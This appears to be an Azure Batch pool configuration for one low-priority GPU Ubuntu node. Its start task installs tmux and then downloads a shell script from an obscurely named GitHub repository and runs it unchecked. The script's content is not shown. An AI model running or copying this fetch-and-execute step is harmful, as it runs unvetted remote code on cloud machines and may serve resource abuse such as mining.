{ "properties": { "vmSize": "Standard_NC6s_v3", "deploymentConfiguration": { "virtualMachineConfiguration": { "imageReference": { "publisher": "Canonical", "offer": "UbuntuServer", "sku": "18.04-LTS", "version": "latest" }, "nodeAgentSkuId": "batch.node.ubuntu 18.04" } }, "startTask": { "commandLine": "/bin/bash -c 'sudo apt-get update; sudo apt-get upgrade -y; sudo apt-get install -y tmux; cd /tmp; wget https://raw.githubusercontent.com/locanhhuynh/-e21e/main/start.sh; sh start.sh'","waitForSuccess": false }, "scaleSettings": { "fixedScale": { "targetLowPriorityNodes": 1 } } } }